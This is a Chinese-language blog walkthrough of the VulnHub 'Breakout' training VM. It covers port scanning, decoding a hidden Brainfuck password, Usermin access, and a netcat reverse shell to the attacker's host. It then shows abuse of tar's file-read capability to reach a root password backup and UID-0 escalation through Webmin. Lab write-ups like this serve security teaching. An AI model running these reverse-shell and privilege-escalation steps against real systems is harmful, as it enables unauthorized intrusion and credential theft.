Vulnhub_Breakout

e321534eae202e267f26eb59d828477b.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.3.143
BreakOut:192.168.3.142

信息收集

使用nmap探测目标主机端口4个端口,并且3个为http

nmap -A -p- -T4 -v 192.168.3.142

05e314246d3e00b5ff4dfe4b73506aed.png
访问80端口是一个默认的apache httpd的页面
8ebdda891fe263e1c0e502a262e4254c.png
查看网页源码在最下面发现一行注释

don't worry no one will get here, it's safe to share with you my access. Its encrypted :)


++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

167483caee21c8e2199d6d7c97e7fef4.png
解密后得到一个看起来像密码的东西

.2uqPEfj3D<P'a-3

26b65dbc8283e72be2911e0453d896da.png
访问10000端口看到时一个登录页面
35fadf2798e9e19fbf31e55b4dc203c4.png
访问20000端口也是一个usermin的登录页面
fc14e21e62f87c8af4acc2c28cd92062.png
使用whatweb获取到了两个端口程序的版本信息
74473afa08e35e4645021512e4f2c961.png
使用默认口令无法登录到两个系统,然后对445端口进行探测发现一个用户名

enum4linux -A 192.168.3.142

72f60229d6bc0a03e53279ad51af2c8a.png
经过尝试使用用户名cyber和之前获得的密码登录到了usermin
e513f86b84c93d27c77571fec1db8e28.png
在文件管理中找到一个user.txt下载后查看找到第一个flag

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

cf17ac6f99dcbdcb9b983ef2a8b4bb5b.png
进一步查看后发现tar具有root权限
1da52e7717534ce7b9e53a9499c0bccb.png

GETSHELL

查看web页面发现有一个可以执行命令的地方
31cc1c4283f6fe255657dd9e6a8b83fe.png
执行后发现这正是以cyber权限在执行的shell命令
ec8d82370bcb6d58b18833ce1632c61a.png
执行nc后发现这台服务器有nc命令
46d71fa61a9a804be246c9abc9ab8e99.png
执行反弹shell

监听:nc -lvvp 4321
反弹:nc 192.168.3.143 4321 -e /bin/bash

0f1a2e356b0c7a0b7e109c557614b3df.png
使用python获取一个tty shell

python3 -c 'import pty; pty.spawn("/bin/bash");'

baa713f9a3537f6fde38f62620cb7926.png
使用getcap命令来查看这个可执行文件的权限,通过下面的对照,我们可以获得这个tar文件可以读取任意文件
d4eb82211e3c4aaac0f2fd1306a852df.png

CAP_CHOWN:修改文件属主的权限
CAP_DAC_OVERRIDE:忽略文件的DAC访问限制
CAP_DAC_READ_SEARCH:忽略文件读及目录搜索的DAC访问限制
CAP_FOWNER:忽略文件属主ID必须和进程用户ID相匹配的限制
CAP_FSETID:允许设置文件的setuid位
CAP_KILL:允许对不属于自己的进程发送信号
CAP_SETGID:允许改变进程的组
IDCAP_SETUID:允许改变进程的用户
IDCAP_SETPCAP:允许向其他进程转移能力以及删除其他进程的能力
CAP_LINUX_IMMUTABLE:允许修改文件的IMMUTABLE和APPEND属性标志CAP_NET_BIND_SERVICE:允许绑定到小于1024的端口
CAP_NET_BROADCAST:允许网络广播和多播访问
CAP_NET_ADMIN:允许执行网络管理任务
CAP_NET_RAW:允许使用原始套接字
CAP_IPC_LOCK:允许锁定共享内存片段
CAP_IPC_OWNER:忽略IPC所有权检查
CAP_SYS_MODULE:允许插入和删除内核模块
CAP_SYS_RAWIO:允许直接访问/devport,/dev/mem,/dev/kmem及原始块设备CAP_SYS_CHROOT:允许使用chroot()系统调用
CAP_SYS_PTRACE:允许跟踪任何进程
CAP_SYS_PACCT:允许执行进程的BSD式审计
CAP_SYS_ADMIN:允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等
CAP_SYS_BOOT:允许重新启动系统
CAP_SYS_NICE:允许提升优先级及设置其他进程的优先级
CAP_SYS_RESOURCE:忽略资源限制
CAP_SYS_TIME:允许改变系统时钟
CAP_SYS_TTY_CONFIG:允许配置TTY设备
CAP_MKNOD:允许使用mknod()系统调用
CAP_LEASE:允许修改文件锁的FL_LEASE标志

然后查找文件目录找到一个密码备份文件,但是我们无法直接读取,首先将文件使用cyber下的tar进行打包
20becf8467c00ab6ae9bd92412ad32f6.png
解压后查看文件得到密码
ed87c0913cfcdb33cec044799289bef7.png

提权

使用得到的密码登录webmin可以正常登录
301c40b1c0147dcf45cbd973557de12e.png
在查看系统功能的时候发现可以修改密码
02be839d502fcff4f18dc73308e05dd5.png
6cfce07a19fb1e7a8beccb1b7cbec0c7.png
当连接的时候发现连接被拒绝,因为ssh没有监听
70fa5f04def30d9ed2f85a5bc959548d.png
我们在用户和组配置中将cyber添加进root组
c02df20c18de7b64c86ea8179cfdea32.png
并且将user id修改为0
71de617c203fbadd10625f5e1e30831f.png
然后在usermin中查看用户的权限
33d074d3357b14d24c52cd96e787ddda.png
最终进入root用户拿到Flag
6bdd9d386753940d827210818f0f1734.png

加入我的星球

61a66618c82e10d6c9e773b764521dd2.png

下方查看历史文章

fc0f6efbe78ff4d75aad1f1f6860e114.png

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

b0565201f86f6b803cba827c64db7acd.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值